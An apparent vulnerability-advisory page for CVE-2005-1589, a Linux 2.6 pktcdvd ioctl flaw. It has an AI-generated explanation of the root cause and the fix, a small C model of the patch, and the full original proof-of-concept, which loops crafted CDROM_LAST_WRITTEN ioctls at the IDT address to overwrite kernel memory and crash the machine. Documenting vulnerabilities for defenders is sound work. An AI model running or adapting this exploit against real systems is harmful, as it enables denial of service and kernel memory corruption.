VYPR
Unrated severity · NVD Advisory · Published May 17, 2005 · Updated Apr 16, 2026

CVE-2005-1589

Description

The pkt_ioctl function in the pktcdvd block device ioctl handler (pktcdvd.c) in Linux kernel 2.6.12-rc4 and earlier calls the wrong function before passing an ioctl to the block device, which crosses security boundaries by making kernel address space accessible from user space and allows local users to cause a denial of service and possibly execute arbitrary code, a similar vulnerability to CVE-2005-1264.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Vulnerability mechanics

Root cause

"The pkt_ioctl function incorrectly calls ioctl_by_bdev with user-controlled arguments, allowing access to kernel memory."

Attack vector

A local user with read access to a pktcdvd block device can trigger the vulnerability by calling the `sys_ioctl` system call with the `CDROM_LAST_WRITTEN` command and a crafted argument. This argument points to kernel memory, which the vulnerable function then attempts to access. The exploit attempts to overwrite kernel data structures, leading to a denial of service or arbitrary code execution [ref_id=1].

Affected code

The vulnerability resides in the `pkt_ioctl` function within the `drivers/block/pktcdvd.c` file. Specifically, the `CDROM_LAST_WRITTEN` and `CDROMEJECT` ioctl commands incorrectly use `ioctl_by_bdev` to process their arguments, which can lead to memory corruption [ref_id=2].

What the fix does

The patch replaces the call to `ioctl_by_bdev` with `blkdev_ioctl`. This change ensures that the ioctl command is handled correctly within the kernel's block device layer, preventing the misuse of user-supplied memory addresses and thus closing the security boundary crossing [ref_id=2].
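To show why swapping `ioctl_by_bdev` for `blkdev_ioctl` closes the hole, here is an added user-space model (not kernel code and not from this advisory or the kernel tree): `ioctl_by_bdev()` in 2.6.12-rc4 wrapped its call in `set_fs(KERNEL_DS)` because it was meant for in-kernel callers passing kernel pointers, so the `CDROM_LAST_WRITTEN` handler's `copy_to_user()` stopped rejecting a kernel address handed in from user space. The `TASK_SIZE` split, the simplified `access_ok()` and the write counter are assumptions of the model.

```c
#include <stdbool.h>
#include <stdio.h>

/* Constructed: 32-bit x86, 3G/1G split; 0xc0100000 (the PoC's fallback target) is kernel space. */
#define TASK_SIZE   0xc0000000UL
#define USER_DS     TASK_SIZE       /* address limit while running on behalf of user space */
#define KERNEL_DS   0xffffffffUL    /* address limit ioctl_by_bdev() switched to */
#define EFAULT      14

static unsigned long addr_limit = USER_DS;   /* stands in for current_thread_info()->addr_limit */
static unsigned long kernel_writes = 0;      /* how many writes landed in kernel space (model only) */

/* access_ok(): the only check between a caller-supplied pointer and kernel memory (simplified). */
static bool access_ok(unsigned long addr, unsigned long size)
{
    return addr + size <= addr_limit;
}

/* Model of the CDROM_LAST_WRITTEN handler: copy_to_user((long __user *)arg, &last, sizeof(long)). */
static int cdrom_last_written(unsigned long arg)
{
    if (!access_ok(arg, sizeof(long)))
        return -EFAULT;
    if (arg >= TASK_SIZE)
        kernel_writes++;    /* with a raised limit the kernel overwrites its own memory */
    return 0;
}

/* Vulnerable path: pkt_ioctl() -> ioctl_by_bdev(), which wrapped the call in set_fs(KERNEL_DS). */
static int pkt_ioctl_vulnerable(unsigned long arg)
{
    unsigned long old_fs = addr_limit;
    addr_limit = KERNEL_DS;
    int ret = cdrom_last_written(arg);
    addr_limit = old_fs;
    return ret;
}

/* Fixed path: pkt_ioctl() -> blkdev_ioctl(), address limit left at USER_DS. */
static int pkt_ioctl_fixed(unsigned long arg)
{
    return cdrom_last_written(arg);
}

int main(void)
{
    printf("vulnerable, kernel target: %d\n", pkt_ioctl_vulnerable(0xc0100000UL));   /* 0 */
    printf("fixed, kernel target:      %d\n", pkt_ioctl_fixed(0xc0100000UL));        /* -14 */
    return 0;
}
```

The same user-space buffer address passes both paths; only a kernel-space address behaves differently, which is exactly the boundary the patch restores.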

Preconditions

  • Input: Read access to a device node managed by pktcdvd (e.g., /dev/hdc).
  • Config: The Linux kernel must be version 2.6.12-rc4 or earlier, and the pktcdvd module must be loaded.

Reproduction

```c
/*
 * pktcdvd_dos.c proof-of-concept
 * This is only a lame POC which will crash the machine, no root shell here.
 * --- alert7
 * 2005-5-15
 * the vulnerability in 2.6 up to and including 2.6.12-rc4
 *
 * gcc -o pktcdvd_dos pktcdvd_dos.c
 *
 * NOTE: require user can read pktcdvd block device
 */

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <signal.h>
#include <paths.h>
#include <grp.h>
#include <setjmp.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/ipc.h>
#include <sys/shm.h>
#include <sys/ucontext.h>
#include <sys/wait.h>
#include <asm/ldt.h>
#include <asm/page.h>
#include <asm/segment.h>
#include <linux/unistd.h>
#include <linux/linkage.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <linux/sysctl.h>
#include <linux/cdrom.h>

#define __NR_sys_ioctl __NR_ioctl

#define PKTCDVDDEVICE "/dev/hdc"

/* old-style syscall stub (2.6-era headers) */
static inline _syscall3(int, sys_ioctl, int, fd, int, cmd, unsigned long, arg);

struct idtr {
    unsigned short limit;
    unsigned int base;
} __attribute__ ((packed));

/* read the IDT base with sidt */
unsigned int get_addr_idt()
{
    struct idtr idtr;
    asm("sidt %0" : "=m" (idtr));
    return idtr.base;
}

struct desc_struct {
    unsigned long a, b;
};

int main(int argc, char **argv)
{
    unsigned int ptr_idt;
    int iret;
    int fd;

    printf("[++]user stack addr %p \n", &ptr_idt);
    if (((unsigned long)&ptr_idt >> 24) == 0xfe) {
        printf("[--]this kernel patched 4g/4g patch,no vulnerability!\n");
        return -1;
    }

    ptr_idt = get_addr_idt();
    printf("[++]IDT Addr %p \n", ptr_idt);

    fd = open(PKTCDVDDEVICE, O_RDONLY);
    if (fd == -1) {
        printf("[--]");
        fflush(stdout);
        perror("open");
        return -1;
    }

    unsigned long WriteTo;

    if ((ptr_idt >> 24) == 0xc0) {
        printf("[++]this OS in Real Linux\n");
        WriteTo = ptr_idt;
    } else {
        printf("[++]this OS maybe in VMWARE\n");
        WriteTo = 0xc0100000;
    }

    printf("[++]call sys_ioctl will crash machine\n");
    fflush(stdout);

    int loopi;
    for (loopi = 0; loopi < 0x100000; loopi++) {
        printf("[++]will write data at 0x%x\n", WriteTo + loopi * 4);
        fflush(stdout);
        iret = sys_ioctl(fd, CDROM_LAST_WRITTEN, WriteTo + loopi * 4);
        if (iret == -1) {
            printf("[--]");
            fflush(stdout);
            perror("ioctl");
            // if in VMWARE, rewriting the ptr_idt address will fail
            printf("[--]still aliving\n");
            close(fd);
            return -1;
        }
    }
    close(fd);
    return 0;
}

// milw0rm.com [2005-05-17]
```

[ref_id=1]

Generated on Jun 2, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
